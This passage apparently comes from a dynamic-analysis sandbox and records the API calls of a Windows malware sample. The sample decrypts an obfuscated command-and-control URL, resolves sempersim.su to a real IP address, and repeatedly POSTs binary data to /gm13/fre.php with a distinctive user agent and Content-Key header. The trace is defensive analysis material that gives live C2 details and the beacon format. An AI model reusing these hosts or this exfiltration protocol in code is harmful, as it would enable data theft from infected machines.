*/*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0258.600] GetProcessHeap () returned 0x620000 [0258.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0258.600] GetProcessHeap () returned 0x620000 [0258.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0258.601] GetProcessHeap () returned 0x620000 [0258.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643248 [0258.601] GetProcessHeap () returned 0x620000 [0258.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0258.602] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0258.602] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0258.602] GetProcessHeap () returned 0x620000 [0258.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0258.602] GetProcessHeap () returned 0x620000 [0258.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0258.603] send (s=0x3e4, buf=0x63a880*, len=237, flags=0) returned 237 [0258.605] send (s=0x3e4, buf=0x6421e0*, len=159, flags=0) returned 159 [0258.605] GetProcessHeap () returned 0x620000 [0258.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0258.605] recv (in: s=0x3e4, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0260.393] GetProcessHeap () returned 0x620000 [0260.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0260.393] GetProcessHeap () returned 0x620000 [0260.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0260.394] GetProcessHeap () returned 0x620000 [0260.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0260.394] GetProcessHeap () returned 0x620000 [0260.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0260.394] closesocket (s=0x3e4) returned 0 [0260.395] GetProcessHeap () returned 0x620000 [0260.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5f0 | out: hHeap=0x620000) returned 1 [0260.395] GetProcessHeap () returned 0x620000 [0260.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6451e0 | out: hHeap=0x620000) returned 1 [0260.395] GetProcessHeap () returned 0x620000 [0260.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0260.396] GetProcessHeap () returned 0x620000 [0260.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0260.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc08) returned 0x3e4 [0260.398] Sleep (dwMilliseconds=0xea60) [0260.401] GetProcessHeap () returned 0x620000 [0260.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0260.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.403] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.410] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0260.422] GetProcessHeap () returned 0x620000 [0260.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0260.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.424] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0260.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.425] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.426] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.426] GetProcessHeap () returned 0x620000 [0260.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0260.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.427] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0260.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.428] CryptDestroyKey (hKey=0x62d190) returned 1 [0260.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.429] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0260.429] GetProcessHeap () returned 0x620000 [0260.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0260.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.430] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.431] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.438] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.439] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.439] GetProcessHeap () returned 0x620000 [0260.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0260.439] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.439] GetProcessHeap () returned 0x620000 [0260.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0260.440] GetProcessHeap () returned 0x620000 [0260.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0260.440] GetProcessHeap () returned 0x620000 [0260.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0260.440] GetProcessHeap () returned 0x620000 [0260.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0260.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.442] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.448] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0260.457] GetProcessHeap () returned 0x620000 [0260.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0260.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.459] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0260.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.460] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.461] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.461] GetProcessHeap () returned 0x620000 [0260.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0260.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.462] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0260.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.464] CryptDestroyKey (hKey=0x62d210) returned 1 [0260.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0260.467] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0260.467] GetProcessHeap () returned 0x620000 [0260.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646998 [0260.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.468] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0260.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.469] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0260.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.470] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0260.470] GetProcessHeap () returned 0x620000 [0260.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0260.470] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c500*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0260.471] GetProcessHeap () returned 0x620000 [0260.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0260.471] socket (af=2, type=1, protocol=6) returned 0x3e8 [0260.472] connect (s=0x3e8, name=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0260.525] FreeAddrInfoW (pAddrInfo=0x63c500*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0260.525] GetProcessHeap () returned 0x620000 [0260.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0260.526] GetProcessHeap () returned 0x620000 [0260.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0260.527] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0260.528] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0260.528] GetProcessHeap () returned 0x620000 [0260.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0260.528] GetProcessHeap () returned 0x620000 [0260.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0260.529] GetProcessHeap () returned 0x620000 [0260.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0260.529] GetProcessHeap () returned 0x620000 [0260.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0260.529] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0260.530] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0260.530] GetProcessHeap () returned 0x620000 [0260.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0260.530] GetProcessHeap () returned 0x620000 [0260.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0260.530] send (s=0x3e8, buf=0x63a880*, len=237, flags=0) returned 237 [0260.531] send (s=0x3e8, buf=0x6421e0*, len=159, flags=0) returned 159 [0260.531] GetProcessHeap () returned 0x620000 [0260.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0260.531] recv (in: s=0x3e8, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0262.192] GetProcessHeap () returned 0x620000 [0262.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0262.193] GetProcessHeap () returned 0x620000 [0262.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0262.193] GetProcessHeap () returned 0x620000 [0262.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0262.193] GetProcessHeap () returned 0x620000 [0262.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0262.194] closesocket (s=0x3e8) returned 0 [0262.194] GetProcessHeap () returned 0x620000 [0262.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0262.194] GetProcessHeap () returned 0x620000 [0262.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646998 | out: hHeap=0x620000) returned 1 [0262.195] GetProcessHeap () returned 0x620000 [0262.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0262.195] GetProcessHeap () returned 0x620000 [0262.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0262.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc0c) returned 0x3e8 [0262.201] Sleep (dwMilliseconds=0xea60) [0262.215] GetProcessHeap () returned 0x620000 [0262.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6434d0 [0262.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.216] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.221] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0262.227] GetProcessHeap () returned 0x620000 [0262.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0262.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.228] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0262.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.231] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.232] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.232] GetProcessHeap () returned 0x620000 [0262.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0262.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.233] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6434d0, pdwDataLen=0x19fcfc | out: pbData=0x6434d0, pdwDataLen=0x19fcfc) returned 1 [0262.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.234] CryptDestroyKey (hKey=0x62d710) returned 1 [0262.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.235] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0262.235] GetProcessHeap () returned 0x620000 [0262.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0262.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.236] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.237] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.237] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.238] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.238] GetProcessHeap () returned 0x620000 [0262.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0262.238] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0262.238] GetProcessHeap () returned 0x620000 [0262.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0262.239] GetProcessHeap () returned 0x620000 [0262.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0262.239] GetProcessHeap () returned 0x620000 [0262.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0262.240] GetProcessHeap () returned 0x620000 [0262.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0262.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.249] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0262.255] GetProcessHeap () returned 0x620000 [0262.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0262.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.256] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0262.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.256] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.257] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.257] GetProcessHeap () returned 0x620000 [0262.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0262.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.259] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0262.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.259] CryptDestroyKey (hKey=0x62d210) returned 1 [0262.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0262.262] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0262.262] GetProcessHeap () returned 0x620000 [0262.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6451e0 [0262.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.263] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0262.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.264] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0262.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.265] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0262.265] GetProcessHeap () returned 0x620000 [0262.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0262.265] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb08*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0262.266] GetProcessHeap () returned 0x620000 [0262.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0262.266] socket (af=2, type=1, protocol=6) returned 0x3ec [0262.267] connect (s=0x3ec, name=0x63eb08*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0262.319] FreeAddrInfoW (pAddrInfo=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb08*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0262.319] GetProcessHeap () returned 0x620000 [0262.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0262.319] GetProcessHeap () returned 0x620000 [0262.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0262.320] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0262.321] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0262.321] GetProcessHeap () returned 0x620000 [0262.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0262.321] GetProcessHeap () returned 0x620000 [0262.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0262.321] GetProcessHeap () returned 0x620000 [0262.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642fc0 [0262.321] GetProcessHeap () returned 0x620000 [0262.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0262.322] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0262.323] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0262.323] GetProcessHeap () returned 0x620000 [0262.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0262.323] GetProcessHeap () returned 0x620000 [0262.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | 